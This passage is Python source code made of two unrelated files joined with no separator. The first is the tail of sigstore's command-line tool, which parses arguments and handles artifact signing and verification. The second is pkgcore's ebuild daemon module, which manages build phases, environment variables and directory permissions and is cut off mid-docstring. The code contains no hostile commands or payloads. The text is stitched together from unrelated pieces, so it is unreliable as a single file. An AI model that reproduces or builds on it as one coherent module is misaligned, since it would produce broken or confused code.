metavar="URL", type=str, default=DEFAULT_REKOR_URL, help="The Rekor instance to use (conflicts with --staging)", ) instance_options.add_argument( "--ctfe", dest="ctfe_pem", metavar="FILE", type=argparse.FileType("rb"), help="A PEM-encoded public key for the CT log (conflicts with --staging)", default=_Embedded("ctfe.pub"), ) instance_options.add_argument( "--rekor-root-pubkey", metavar="FILE", type=argparse.FileType("rb"), help="A PEM-encoded root public key for Rekor itself (conflicts with --staging)", default=_Embedded("rekor.pub"), ) instance_options.add_argument( "--oidc-issuer", metavar="URL", type=str, default=DEFAULT_OAUTH_ISSUER, help="The OpenID Connect issuer to use (conflicts with --staging)", ) instance_options.add_argument( "--staging", action="store_true", help="Use sigstore's staging instances, instead of the default production instances", ) sign.add_argument( "files", metavar="FILE", type=Path, nargs="+", help="The file to sign", ) # `sigstore verify` verify = subcommands.add_parser( "verify", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) input_options = verify.add_argument_group("Verification inputs") input_options.add_argument( "--certificate", "--cert", metavar="FILE", type=Path, help="The PEM-encoded certificate to verify against; not used with multiple inputs", ) input_options.add_argument( "--signature", metavar="FILE", type=Path, help="The signature to verify against; not used with multiple inputs", ) verification_options = verify.add_argument_group("Extended verification options") verification_options.add_argument( "--cert-email", metavar="EMAIL", type=str, help="The email address to check for in the certificate's Subject Alternative Name", ) verification_options.add_argument( "--cert-oidc-issuer", metavar="URL", type=str, help="The OIDC issuer URL to check for in the certificate's OIDC issuer extension", ) instance_options = verify.add_argument_group("Sigstore instance options") instance_options.add_argument( "--rekor-url", metavar="URL", type=str, default=DEFAULT_REKOR_URL, help="The Rekor instance to use (conflicts with --staging)", ) instance_options.add_argument( "--staging", action="store_true", help="Use sigstore's staging instances, instead of the default production instances", ) verify.add_argument( "files", metavar="FILE", type=Path, nargs="+", help="The file to verify", ) return parser def main() -> None: parser = _parser() args = parser.parse_args() logger.debug(f"parsed arguments {args}") # Stuff the parser back into our namespace, so that we can use it for # error handling later. args._parser = parser if args.subcommand == "sign": _sign(args) elif args.subcommand == "verify": _verify(args) else: parser.error(f"Unknown subcommand: {args.subcommand}") def _sign(args: argparse.Namespace) -> None: # `--no-default-files` has no effect on `--output-{signature,certificate}`, # but we forbid it because it indicates user confusion. if args.no_default_files and (args.output_signature or args.output_certificate): args._parser.error( "--no-default-files may not be combined with " "--output-signature or --output-certificate", ) # Fail if `--output-signature` or `--output-certificate` is specified # *and* we have more than one input. if (args.output_signature or args.output_certificate) and len(args.files) > 1: args._parser.error( "Error: --output-signature and --output-certificate can't be used with " "explicit outputs for multiple inputs; consider using --output", ) # Build up the map of inputs -> outputs ahead of any signing operations, # so that we can fail early if overwriting without `--overwrite`. output_map = {} for file in args.files: if not file.is_file(): args._parser.error(f"Input must be a file: {file}") sig, cert = args.output_signature, args.output_certificate if not sig and not cert and not args.no_default_files: sig = file.parent / f"{file.name}.sig" cert = file.parent / f"{file.name}.crt" if not args.overwrite: extants = [] if sig and sig.exists(): extants.append(str(sig)) if cert and cert.exists(): extants.append(str(cert)) if extants: args._parser.error( "Refusing to overwrite outputs without --overwrite: " f"{', '.join(extants)}" ) output_map[file] = {"cert": cert, "sig": sig} # Select the signer to use. if args.staging: logger.debug("sign: staging instances requested") signer = Signer.staging() args.oidc_issuer = STAGING_OAUTH_ISSUER elif args.fulcio_url == DEFAULT_FULCIO_URL and args.rekor_url == DEFAULT_REKOR_URL: signer = Signer.production() else: signer = Signer( fulcio=FulcioClient(args.fulcio_url), rekor=RekorClient( args.rekor_url, args.rekor_root_pubkey.read(), args.ctfe_pem.read() ), ) # The order of precedence is as follows: # # 1) Explicitly supplied identity token # 2) Ambient credential detected in the environment, unless disabled # 3) Interactive OAuth flow if not args.identity_token and not args.oidc_disable_ambient_providers: args.identity_token = detect_credential() if not args.identity_token: issuer = Issuer(args.oidc_issuer) if args.oidc_client_secret is None: args.oidc_client_secret = "" # nosec: B105 args.identity_token = get_identity_token( args.oidc_client_id, args.oidc_client_secret, issuer, ) if not args.identity_token: args._parser.error("No identity token supplied or detected!") for file, outputs in output_map.items(): logger.debug(f"signing for {file.name}") result = signer.sign( input_=file.read_bytes(), identity_token=args.identity_token, ) print("Using ephemeral certificate:") print(result.cert_pem) print(f"Transparency log entry created at index: {result.log_entry.log_index}") sig_output: TextIO if outputs["sig"]: sig_output = outputs["sig"].open("w") else: sig_output = sys.stdout print(result.b64_signature, file=sig_output) if outputs["sig"]: print(f"Signature written to file {outputs['sig']}") if outputs["cert"] is not None: cert_output = open(outputs["cert"], "w") print(result.cert_pem, file=cert_output) print(f"Certificate written to file {outputs['cert']}") def _verify(args: argparse.Namespace) -> None: # Fail if `--certificate` or `--signature` is specified and we have more than one input. if (args.certificate or args.signature) and len(args.files) > 1: args._parser.error( "--certificate and --signature can only be used with a single input file" ) # The converse of `sign`: we build up an expected input map and check # that we have everything so that we can fail early. input_map = {} for file in args.files: if not file.is_file(): args._parser.error(f"Input must be a file: {file}") sig, cert = args.signature, args.certificate if sig is None: sig = file.parent / f"{file.name}.sig" if cert is None: cert = file.parent / f"{file.name}.crt" missing = [] if not sig.is_file(): missing.append(str(sig)) if not cert.is_file(): missing.append(str(cert)) if missing: args._parser.error( f"Missing verification materials for {(file)}: {', '.join(missing)}" ) input_map[file] = {"cert": cert, "sig": sig} if args.staging: logger.debug("verify: staging instances requested") verifier = Verifier.staging() elif args.rekor_url == DEFAULT_REKOR_URL: verifier = Verifier.production() else: # TODO: We need CLI flags that allow the user to figure the Fulcio cert chain # for verification. args._parser.error( "Custom Rekor and Fulcio configuration for verification isn't fully supported yet!", ) for file, inputs in input_map.items(): # Load the signing certificate logger.debug(f"Using certificate from: {inputs['cert']}") certificate = inputs["cert"].read_bytes() # Load the signature logger.debug(f"Using signature from: {inputs['sig']}") signature = inputs["sig"].read_bytes() logger.debug(f"Verifying contents from: {file}") result = verifier.verify( input_=file.read_bytes(), certificate=certificate, signature=signature, expected_cert_email=args.cert_email, expected_cert_oidc_issuer=args.cert_oidc_issuer, ) if result: print(f"OK: {file}") else: result = cast(VerificationFailure, result) print(f"FAIL: {file}") print(f"Failure reason: {result.reason}", file=sys.stderr) if isinstance(result, CertificateVerificationFailure): # If certificate verification failed, it's either because of # a chain issue or some outdated state in sigstore itself. # These might already be resolved in a newer version, so # we suggest that users try to upgrade and retry before # anything else. print( dedent( f""" This may be a result of an outdated `sigstore` installation. Consider upgrading with: python -m pip install --upgrade sigstore Additional context: {result.exception} """ ), file=sys.stderr, ) sys.exit(1)
""" EBuild Daemon (ebd), main high level interface to ebuild execution env. Wraps :obj:`pkgcore.ebuild.processor` functionality into a higher level api, for example per phase methods. """ __all__ = ( "ebd", "setup_mixin", "install_op", "uninstall_op", "replace_op", "buildable", "binpkg_localize") import errno import os import re import shutil import sys import time from collections import defaultdict from functools import partial from itertools import chain from tempfile import TemporaryFile from snakeoil import data_source, klass from snakeoil.compatibility import IGNORED_EXCEPTIONS from snakeoil.contexts import chdir from snakeoil.currying import post_curry, pretty_docs from snakeoil.fileutils import touch from snakeoil.osutils import ensure_dirs, listdir_files, normpath, pjoin from snakeoil.process.spawn import is_sandbox_capable, is_userpriv_capable, spawn, spawn_bash from snakeoil.sequences import iflatten_instance, iter_stable_unique from .. import const from ..log import logger from ..operations import format, observer from ..os_data import portage_gid, portage_uid, xargs from ..package.mutated import MutatedPkg from . import ebd_ipc, ebuild_built, errors from .processor import (ProcessorError, chuck_UnhandledCommand, expected_ebuild_env, inherit_handler, release_ebuild_processor, request_ebuild_processor) class ebd: def __init__(self, pkg, initial_env=None, env_data_source=None, observer=None, clean=True, tmp_offset=None): """ :param pkg: :class:`pkgcore.ebuild.ebuild_src.package` instance this env is being setup for :param initial_env: initial environment to use for this ebuild :param env_data_source: a :obj:`snakeoil.data_source.base` instance to restore the environment from- used for restoring the state of an ebuild processing, whether for unmerging, or walking phases during building """ self.pkg = pkg self.eapi = pkg.eapi if not hasattr(self, "observer"): self.observer = observer if not self.eapi.is_supported: raise TypeError(f"package {pkg} uses unsupported EAPI: {str(self.eapi)!r}") if initial_env is not None: # copy. self.env = dict(initial_env) for x in ("USE", "ACCEPT_LICENSE"): self.env.pop(x, None) else: self.env = {} # Drop all USE_EXPAND variables from the exported environment. for u in self.domain.profile.use_expand: self.env.pop(u, None) # Only export USE_EXPAND variables for the package's enabled USE flags. d = defaultdict(list) for u in pkg.use: m = self.domain.use_expand_re.match(u) if m: use_expand, value = m.groups() d[use_expand.upper()].append(value) for k, v in d.items(): self.env[k] = ' '.join(sorted(v)) self.bashrc = self.env.pop("bashrc", ()) self.features = set(x.lower() for x in self.domain.features) self.env["FEATURES"] = ' '.join(sorted(self.features)) self.set_path_vars(self.env, self.pkg, self.domain) # internally implemented EAPI specific functions to skip when exporting env self.env["PKGCORE_EAPI_FUNCS"] = ' '.join(self.eapi.bash_funcs) self.env_data_source = env_data_source if (env_data_source is not None and not isinstance(env_data_source, data_source.base)): raise TypeError( "env_data_source must be None, or a pkgcore.data_source.base " f"derivative: {env_data_source.__class__}: {env_data_source}") iuse_effective_regex = f"^({"|".join(re.escape(x) for x in pkg.iuse_effective)})$" self.env["PKGCORE_IUSE_EFFECTIVE"] = iuse_effective_regex.replace("\\.\\*", ".*") expected_ebuild_env(pkg, self.env, env_source_override=self.env_data_source) self.env["PKGCORE_FINALIZED_RESTRICT"] = ' '.join(str(x) for x in pkg.restrict) self.restrict = pkg.restrict for x in ("sandbox", "userpriv"): setattr(self, x, self.feat_or_bool(x) and not (x in self.restrict)) if self.userpriv and os.getuid() != 0: self.userpriv = False if "PORT_LOGDIR" in self.env: self.logging = pjoin( self.env["PORT_LOGDIR"], "%s:%s:%s.log" % ( pkg.cpvstr, self.__class__.__name__, time.strftime("%Y%m%d-%H%M%S", time.localtime()))) del self.env["PORT_LOGDIR"] else: self.logging = False self.env["PKGCORE_PKG_REPO"] = pkg.source_repository self.env["XARGS"] = xargs # wipe variables listed in ENV_UNSET for supporting EAPIs if self.eapi.options.has_env_unset: for x in self.env.pop('ENV_UNSET', ()): self.env.pop(x, None) # wipe any remaining internal settings from the exported env wipes = [k for k, v in self.env.items() if not isinstance(v, str)] for k in wipes: del self.env[k] self._set_op_vars(tmp_offset) self.clean_at_start = clean self.clean_needed = False # various IPC command support self._ipc_helpers = { # bash helpers 'doins': ebd_ipc.Doins(self), 'dodoc': ebd_ipc.Dodoc(self), 'dohtml': ebd_ipc.Dohtml(self), 'doinfo': ebd_ipc.Doinfo(self), 'dodir': ebd_ipc.Dodir(self), 'doexe': ebd_ipc.Doexe(self), 'dobin': ebd_ipc.Dobin(self), 'dosbin': ebd_ipc.Dosbin(self), 'dolib': ebd_ipc.Dolib(self), 'dolib.so': ebd_ipc.Dolib_so(self), 'dolib.a': ebd_ipc.Dolib_a(self), 'doman': ebd_ipc.Doman(self), 'domo': ebd_ipc.Domo(self), 'dosym': ebd_ipc.Dosym(self), 'dohard': ebd_ipc.Dohard(self), 'keepdir': ebd_ipc.Keepdir(self), # bash functions 'has_version': ebd_ipc.Has_Version(self), 'best_version': ebd_ipc.Best_Version(self), 'unpack': ebd_ipc.Unpack(self), 'eapply': ebd_ipc.Eapply(self), 'eapply_user': ebd_ipc.Eapply_User(self), 'docompress': ebd_ipc.Docompress(self), 'dostrip': ebd_ipc.Dostrip(self), # internals 'filter_env': ebd_ipc.FilterEnv(self), } def start(self): if self.clean_at_start: self.clean_needed = True if not self.cleanup(): return False self.setup_workdir() self._setup_env_data_source() self.clean_needed = True return True @staticmethod def set_path_vars(env, pkg, domain): # XXX: note this is just EAPI 3 and EAPI 7 compatibility; not full prefix, soon.. trailing_slash = pkg.eapi.options.trailing_slash env['ROOT'] = domain.root.rstrip(os.sep) + trailing_slash env['PKGCORE_PREFIX_SUPPORT'] = 'false' if pkg.eapi.options.prefix_capable: env['EPREFIX'] = domain.prefix.rstrip(os.sep) env['EROOT'] = ( pjoin(env['ROOT'].rstrip(trailing_slash), env['EPREFIX']) + trailing_slash) env['PKGCORE_PREFIX_SUPPORT'] = 'true' if pkg.eapi.options.has_sysroot: env['SYSROOT'] = env['ROOT'] env['ESYSROOT'] = pjoin(env['SYSROOT'], env['EPREFIX']) env['BROOT'] = env['EPREFIX'] def _set_op_vars(self, tmp_offset): # don't fool with this, without fooling with setup. self.tmpdir = self.domain.pm_tmpdir if tmp_offset: self.tmpdir = pjoin(self.tmpdir, tmp_offset.strip(os.sep)) self.builddir = pjoin(self.tmpdir, self.env["CATEGORY"], self.env["PF"]) for x, y in (("T", "temp"), ("WORKDIR", "work"), ("D", "image"), ("HOME", "homedir"), ("PKGCORE_EMPTYDIR", "empty")): self.env[x] = normpath(pjoin(self.builddir, y)) self.env["D"] += self.eapi.options.trailing_slash self.env["PORTAGE_LOGFILE"] = normpath(pjoin(self.env["T"], "build.log")) # XXX: Note that this is just EAPI 3 support, not yet prefix # full awareness. if self.pkg.eapi.options.prefix_capable: self.env["ED"] = normpath( pjoin(self.env["D"].rstrip(os.sep), self.env["EPREFIX"])) \ + self.eapi.options.trailing_slash # temporary install dir correct for all EAPIs self.ED = self.env.get('ED', self.env['D']) def get_env_source(self): with open(pjoin(self.env["T"], "environment"), "rb") as f: return data_source.bytes_data_source(f.read()) def _setup_env_data_source(self): if not ensure_dirs(self.env["T"], mode=0o770, gid=portage_gid, minimal=True): raise format.FailedDirectory( self.env['T'], "%s doesn't fulfill minimum mode %o and gid %i" % ( self.env['T'], 0o770, portage_gid)) if self.env_data_source is not None: fp = pjoin(self.env["T"], "environment") # load data first (might be a local_source), *then* write # if it's a src_ebuild being installed, trying to do two steps # stomps the local_sources data. data = self.env_data_source.bytes_fileobj().read() with open(fp, "wb") as f: f.write(data) del data def _set_per_phase_env(self, phase, env): self._setup_merge_type(phase, env) # add phase specific helper paths to PATH if they exist ebuild_phase = self.eapi.phases.get(phase, '') if ebuild_phase in self.eapi.helpers: path = chain.from_iterable(( const.PATH_FORCED_PREPEND, self.pkg.eapi.helpers.get('global', ()), self.eapi.helpers[ebuild_phase], os.environ.get('PATH', '').split(os.pathsep), )) env['PATH'] = os.pathsep.join(path) def _setup_merge_type(self, phase, env): # only allowed in pkg_ phases. if (not self.eapi.phases.get(phase, "").startswith("pkg_") and not phase == 'setup-binpkg'): return # note all pkgs have this attribute is_source = getattr(self.pkg, '_is_from_source', True) if self.eapi.options.has_merge_type: env["MERGE_TYPE"] = (is_source and "source") or "binary" else: # we still must export this, just via the portage var name w/ # different values. if we didn't, spec or not, kernel binpkg # merging would be broke. env["EMERGE_FROM"] = (is_source and "ebuild") or "binary" def setup_logging(self): if self.logging and not ensure_dirs(os.path.dirname(self.logging), mode=0o2770, gid=portage_gid): raise format.FailedDirectory( os.path.dirname(self.logging), "PORT_LOGDIR, desired mode 02770 and gid %i" % portage_gid) def setup_workdir(self): # ensure dirs. for k in ("HOME", "T", "WORKDIR", "D"): if not ensure_dirs(self.env[k], mode=0o4770, gid=portage_gid, minimal=True): raise format.FailedDirectory( self.env[k], "%s doesn't fulfill minimum mode %o and gid %i" % (k, 0o770, portage_gid)) # XXX hack, just 'til pkgcore controls these directories if (os.stat(self.env[k]).st_mode & 0o2000): logger.warning(f"{self.env[k]} ( {k} ) is setgid") def _generic_phase(self, phase, userpriv, sandbox, extra_handlers={}, failure_allowed=False, suppress_bashrc=False): """ :param phase: phase to execute :param userpriv: will we drop to :obj:`pkgcore.os_data.portage_uid` and :obj:`pkgcore.os_data.portage_gid` access for this phase? :param sandbox: should this phase be sandboxed? """ if phase not in self.pkg.mandatory_phases: # TODO(ferringb): Note the preinst hack; this will be removed once dyn_pkg_preinst # is dead in full (currently it has a selinux labelling and suidctl ran from there) if phase != 'preinst': return True if 'selinux' not in self.features and 'suidctl' not in self.features: return True shutil.rmtree(self.env["PKGCORE_EMPTYDIR"], ignore_errors=True) os.mkdir(self.env["PKGCORE_EMPTYDIR"]) userpriv = self.userpriv and userpriv sandbox = self.sandbox and sandbox self._set_per_phase_env(phase, self.env) extra_handlers = extra_handlers.copy() extra_handlers.update(self._ipc_helpers) if not suppress_bashrc: extra_handlers.setdefault("request_bashrcs", self._request_bashrcs) return run_generic_phase( self.pkg, phase, self.env, userpriv, sandbox, extra_handlers=extra_handlers, failure_allowed=failure_allowed, logging=self.logging) def _request_bashrcs(self, ebd): for source in self.domain.get_package_bashrcs(self.pkg): if source.path is not None: ebd.write(f"path\n{source.path}") elif source.get_data is not None: raise NotImplementedError else: chuck_UnhandledCommand( ebd, "bashrc request: unable to process bashrc " f"due to source '{source}' due to lacking usable get_*") if not ebd.expect("next"): chuck_UnhandledCommand( ebd, "bashrc transfer, didn't receive 'next' response. " "failure?") ebd.write("end_request") def set_is_replacing(self, *pkgs): if self.eapi.options.exports_replacing: self.env['REPLACING_VERSIONS'] = " ".join(pkg.PVR for pkg in pkgs) def set_is_being_replaced_by(self, pkg=None): if self.eapi.options.exports_replacing and pkg is not None: self.env['REPLACED_BY_VERSION'] = pkg.PVR def cleanup(self, disable_observer=False, force=False): if not force: if not self.clean_needed: return True if not os.path.exists(self.builddir): return True if disable_observer: return self.do_cleanup(disable_observer=disable_observer) return self.do_cleanup() @observer.decorate_build_method("cleanup") def do_cleanup(self): try: shutil.rmtree(self.builddir) # try to wipe the cat dir; if not empty, ignore it try: os.rmdir(os.path.dirname(self.builddir)) except EnvironmentError as e: # POSIX specifies either ENOTEMPTY or EEXIST for non-empty dir # in particular, Solaris uses EEXIST in that case. # https://github.com/pkgcore/pkgcore/pull/181 if e.errno not in (errno.ENOTEMPTY, errno.EEXIST): raise except EnvironmentError as e: raise format.GenericBuildError( f"clean: Caught exception while cleansing: {e}") from e return True def feat_or_bool(self, name, extra_env=None): if name in self.env: v = bool(self.env[name]) del self.env[name] name = name.lower() if v: self.features.add(name) else: if name in self.features: self.features.remove(name) elif extra_env is not None and name in extra_env: v = bool(extra_env[name]) if v: self.features.add(name.lower()) else: self.features.remove(name.lower()) else: v = name.lower() in self.features return v def __stage_step_callback__(self, stage): try: touch(pjoin(self.builddir, f'.{stage}')) except EnvironmentError: # we really don't care... pass def _reload_state(self): try: self.__set_stage_state__( [x[1:] for x in listdir_files(self.builddir) if x.startswith(".")]) except EnvironmentError as e: if e.errno not in (errno.ENOTDIR, errno.ENOENT): raise class setup_mixin: setup_is_for_src = True def setup(self, setup_phase_override=None): self.setup_logging() additional_commands = {} phase_name = "setup-binpkg" if self.setup_is_for_src: phase_name = "setup" if setup_phase_override is not None: phase_name = setup_phase_override if self.setup_is_for_src: additional_commands["request_inherit"] = partial(inherit_handler, self.eclass_cache) return self._generic_phase( phase_name, False, True, extra_handlers=additional_commands) def run_generic_phase(pkg, phase, env, userpriv, sandbox, fd_pipes=None, extra_handlers=None, failure_allowed=False, logging=None, **kwargs): """ :param phase: phase to execute :param env: environment mapping for the phase :param userpriv: will we drop to :obj:`pkgcore.os_data.portage_uid` and :obj:`pkgcore.os_data.portage_gid` access for this phase? :param sandbox: should this phase be sandboxed? :param fd_pipes: use custom file descriptors for ebd instance :type fd_pipes: mapping between file descriptors :param extra_handlers: extra command handlers :type extra_handlers: mapping from string to callable :param failure_allowed: allow failure without raising error :type failure_allowed: boolean :param logging: None or a filepath to log output to :return: True when the phase has finished execution """ userpriv = userpriv and is_userpriv_capable() sandbox = sandbox and is_sandbox_capable() tmpdir = kwargs.get('tmpdir', env.get('T', None)) if env is None: env = expected_ebuild_env(pkg) ebd = request_ebuild_processor(userpriv=userpriv, sandbox=sandbox, fd_pipes=fd_pipes) # this is a bit of a hack; used until ebd accepts observers that handle # the output redirection on its own. Primary relevance is when # stdout/stderr are pointed at a file; we leave buffering on, just # force the flush for synchronization. sys.stdout.flush() sys.stderr.flush() try: if not ebd.run_phase(phase, env, tmpdir=tmpdir, sandbox=sandbox, logging=logging, additional_commands=extra_handlers): if not failure_allowed: raise format.GenericBuildError( phase + ": Failed building (False/0 return from handler)") logger.warning(f"executing phase {phase}: execution failed, ignoring") except Exception as e: if isinstance(e, ebd_ipc.IpcError): # notify bash side of IPC error ebd.write(e.ret) if isinstance(e, ebd_ipc.IpcInternalError): # show main exception cause for internal IPC errors ebd.shutdown_processor(force=True) raise e.__cause__ try: ebd.shutdown_processor() except ProcessorError as pe: # catch die errors during shutdown e = pe release_ebuild_processor(ebd) if isinstance(e, ProcessorError): # force verbose die output e._verbosity = 1 raise e elif isinstance(e, IGNORED_EXCEPTIONS + (format.GenericBuildError,)): raise raise format.GenericBuildError( f"Executing phase {phase}: Caught exception: {e}") from e release_ebuild_processor(ebd) return True class install_op(ebd, format.install): """Phase operations and steps for install execution.""" def __init__(self, domain, pkg, observer): format.install.__init__(self, domain, pkg, observer) ebd.__init__( self, pkg, observer=observer, initial_env=self.domain.settings, env_data_source=pkg.environment, clean=False) preinst = pretty_docs( observer.decorate_build_method("preinst")( post_curry(ebd._generic_phase, "preinst", False, False)), "run the postinst phase") postinst = pretty_docs( observer.decorate_build_method("postinst")( post_curry(ebd._generic_phase, "postinst", False, False)), "run the postinst phase") def add_triggers(self, domain_op, engine): self.new_pkg.add_format_triggers(domain_op, self, engine) class uninstall_op(ebd, format.uninstall): """Phase operations and steps for uninstall execution.""" def __init__(self, domain, pkg, observer): format.uninstall.__init__(self, domain, pkg, observer) ebd.__init__( self, pkg, observer=observer, initial_env=self.domain.settings, env_data_source=pkg.environment, clean=False, tmp_offset="unmerge") prerm = pretty_docs( observer.decorate_build_method("prerm")( post_curry(ebd._generic_phase, "prerm", False, False)), "run the prerm phase") postrm = pretty_docs( observer.decorate_build_method("postrm")( post_curry( ebd._generic_phase, "postrm", False, False, failure_allowed=True)), "run the postrm phase") def add_triggers(self, domain_op, engine): self.old_pkg.add_format_triggers(domain_op, self, engine) def finish(self): self.cleanup() return format.uninstall.finish(self) class replace_op(format.replace): """Phase operations and steps for replace execution.""" install_kls = staticmethod(install_op) uninstall_kls = staticmethod(uninstall_op) def __init__(self, domain, old_pkg, new_pkg, observer): super().__init__(domain, old_pkg, new_pkg, observer) self.install_op = install_op(domain, new_pkg, observer) self.install_op.set_is_replacing(old_pkg) self.uninstall_op = uninstall_op(domain, old_pkg, observer) self.uninstall_op.set_is_being_replaced_by(new_pkg) def start(self): self.install_op.start() self.uninstall_op.start() return True prerm = klass.alias_method("uninstall_op.prerm") postrm = klass.alias_method("uninstall_op.postrm") preinst = klass.alias_method("install_op.preinst") postinst = klass.alias_method("install_op.postinst") def finalize(self): ret = self.uninstall_op.finish() ret2 = self.install_op.finish() return (ret and ret2) def add_triggers(self, domain_op, engine): self.uninstall_op.add_triggers(domain_op, engine) self.install_op.add_triggers(domain_op, engine) class buildable(ebd, setup_mixin, format.build): """Generic build operation.""" # XXX this is unclean- should be handing in strictly what is build # env, rather then dumping domain settings as env. def __init__(self, domain, pkg, verified_files, eclass_cache, observer=None, force_test=False, **kwargs): """ :param pkg: :obj:`pkgcore.ebuild.ebuild_src.package` instance we'll be building :param eclass_cache: the :class:`pkgcore.ebuild.eclass_cache` we'll be using :param verified_files: mapping of fetchables mapped to their disk location """ self._built_class = ebuild_built.fresh_built_package format.build.__init__(self, domain, pkg, verified_files, observer) domain_settings = self.domain.settings ebd.__init__(self, pkg, initial_env=domain_settings, **kwargs) self.env["FILESDIR"] = pjoin(os.path.dirname(pkg.ebuild.path), "files") self.eclass_cache = eclass_cache self.run_test = force_test or self.feat_or_bool("test", domain_settings) self.allow_failed_test = self.feat_or_bool("test-fail-continue", domain_settings) if "test" in self.restrict: self.run_test = False elif not force_test and "test" not in pkg.use: if self.run_test: logger.warning(f"disabling test for {pkg} due to test use flag being disabled") self.run_test = False # XXX minor hack path = self.env["PATH"].split(os.pathsep) for s, default in (("DISTCC", ".distcc"), ("CCACHE", "ccache")): b = (self.feat_or_bool(s, domain_settings) and s not in self.restrict) setattr(self, s.lower(), b) if b: # looks weird I realize, but # pjoin("/foor/bar", "/barr/foo") == "/barr/foo" # and pjoin("/foo/bar", ".asdf") == "/foo/bar/.asdf" self.env.setdefault(s + "_DIR", pjoin(self.domain.tmpdir, default)) # gentoo bug 355283 libdir = self.env.get("ABI") if libdir is not None: libdir = self.env.get(f"LIBDIR_{libdir}") if libdir is not None: libdir = self.env.get(libdir) if libdir is None: libdir = "lib" path.insert(0, f"/usr/{libdir}/{s.lower()}/bin") else: for y in ("_PATH", "_DIR"): if s + y in self.env: del self.env[s+y] self.env["PATH"] = os.pathsep.join(path) # ordering must match appearance order in SRC_URI per PMS self.env["A"] = ' '.join(iter_stable_unique(pkg.distfiles)) if self.eapi.options.has_AA: pkg = self.pkg while hasattr(pkg, '_raw_pkg'): pkg = getattr(pkg, '_raw_pkg') self.env["AA"] = ' '.join(set(iflatten_instance(pkg.distfiles))) if self.eapi.options.has_KV: self.env["KV"] = domain.KV if self.eapi.options.has_merge_type: self.env["MERGE_TYPE"] = "source" if self.eapi.options.has_portdir: self.env["PORTDIR"] = pkg.repo.location self.env["ECLASSDIR"] = eclass_cache.eclassdir if self.setup_is_for_src: # TODO: PORTAGE_ACTUAL_DISTDIR usage by VCS eclasses needs to be # dropped, but it's currently required for repo reuse. self.env['PORTAGE_ACTUAL_DISTDIR'] = domain.distdir self.env['DISTDIR'] = normpath(pjoin(self.builddir, 'distdir')) for k in ('PORTAGE_ACTUAL_DISTDIR', 'DISTDIR'): self.env[k] = os.path.realpath(self.env[k]).rstrip(os.sep) + os.sep def _setup_distfiles(self): # fetch distfiles if not self.verified_files: ops = self.domain.pkg_operations(self.pkg, observer=self.observer) if ops.fetch(): # this break encapsulation and should be refactored. Trace # f35f2 and 6561eac for where this was refactored. self.verified_files = ops.verified_files # symlink them into builddir if self.verified_files: try: if os.path.exists(self.env["DISTDIR"]): if (os.path.isdir(self.env["DISTDIR"]) and not os.path.islink(self.env["DISTDIR"])): shutil.rmtree(self.env["DISTDIR"]) else: os.unlink(self.env["DISTDIR"]) except EnvironmentError as e: raise format.FailedDirectory( self.env["DISTDIR"], f"failed removing existing file/dir/link: {e}") from e if not ensure_dirs(self.env["DISTDIR"], mode=0o770, gid=portage_gid): raise format.FailedDirectory( self.env["DISTDIR"], "failed creating distdir symlink directory") try: for src, dest in [ (k, pjoin(self.env["DISTDIR"], v.filename)) for (k, v) in self.verified_files.items()]: os.symlink(src, dest) except EnvironmentError as e: raise format.GenericBuildError( f"Failed symlinking in distfiles for src {src} -> {dest}: {e}") from e @observer.decorate_build_method("setup") def setup(self): """Execute the setup phase, mapping out to pkg_setup in the ebuild. Necessarily dirs are created as required, and build env is initialized at this point. """ if self.distcc: for p in ("", "/lock", "/state"): if not ensure_dirs(pjoin(self.env["DISTCC_DIR"], p), mode=0o2775, gid=portage_gid): raise format.FailedDirectory( pjoin(self.env["DISTCC_DIR"], p), "failed creating needed distcc directory") if self.ccache: # yuck. st = None try: st = os.stat(self.env["CCACHE_DIR"]) except OSError as e: st = None if not ensure_dirs(self.env["CCACHE_DIR"], mode=0o2775, gid=portage_gid): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed creation of ccache dir") from e # XXX this is more then mildly stupid. st = os.stat(self.env["CCACHE_DIR"]) try: if st.st_gid != portage_gid or (st.st_mode & 0o2775) != 0o2775: try: cwd = os.getcwd() except OSError: cwd = "/" with chdir(cwd): # crap. os.chmod(self.env["CCACHE_DIR"], 0o2775) os.chown(self.env["CCACHE_DIR"], -1, portage_gid) if 0 != spawn( ["chgrp", "-R", str(portage_gid), self.env["CCACHE_DIR"]]): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed changing ownership for CCACHE_DIR") if 0 != spawn_bash( "find '%s' -type d -print0 | %s --null chmod 02775" % (self.env["CCACHE_DIR"], xargs)): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed correcting perms for CCACHE_DIR") if 0 != spawn_bash( "find '%s' -type f -print0 | %s --null chmod 0775" % (self.env["CCACHE_DIR"], xargs)): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed correcting perms for CCACHE_DIR") except OSError as e: raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed ensuring perms/group owner for CCACHE_DIR") from e return setup_mixin.setup(self) def configure(self): """Execute the configure phase. Does nothing if the pkg's EAPI is less than 2 (that spec lacks a separated configure phase). """ if "configure" in self.eapi.phases: return self._generic_phase("configure", True, True) return True def prepare(self): """Execute a source preparation phase. does nothing if the pkg's EAPI is less than 2 """ ret = True if "prepare" in self.eapi.phases: ret = self._generic_phase("prepare", True, True) if (self.eapi.options.user_patches and not os.path.exists(pjoin(self.env['T'], '.user_patches_applied'))): self.observer.error( 'eapply_user (or default) must be called in src_prepare()') raise format.GenericBuildError('missing eapply_user call') return ret def nofetch(self): """Execute the nofetch phase. We need the same prerequisites as setup, so reuse that. """ ensure_dirs(self.env["T"], mode=0o770, gid=portage_gid, minimal=True) return setup_mixin.setup(self, "nofetch") def unpack(self): """Execute the unpack phase.""" if self.setup_is_for_src: self._setup_distfiles() if self.userpriv: try: os.chown(self.env["WORKDIR"], portage_uid, -1) except OSError as e: raise format.GenericBuildError( "failed forcing %i uid for WORKDIR: %s" % (portage_uid, e)) from e return self._generic_phase("unpack", True, True) compile = pretty_docs( observer.decorate_build_method("compile")( post_curry(ebd._generic_phase, "compile", True, True)), "Run the compile phase (maps to src_compile).") @observer.decorate_build_method("install") def install(self): """Run the install phase (maps to src_install).""" # TODO: replace print() usage with observer print(f">>> Install {self.env["PF"]} into {self.ED!r} category {self.env["CATEGORY"]}") ret = self._generic_phase("install", False, True) print(f">>> Completed installing {self.env["PF"]} into {self.ED!r}") return ret @observer.decorate_build_method("test") def test(self): """Run the test phase (if enabled), maps to src_test.""" if not self.run_test: return True return self._generic_phase( "test", True, True, failure_allowed=self.allow_failed_test) def finalize(self): """Finalize the operation. This yields a built package, 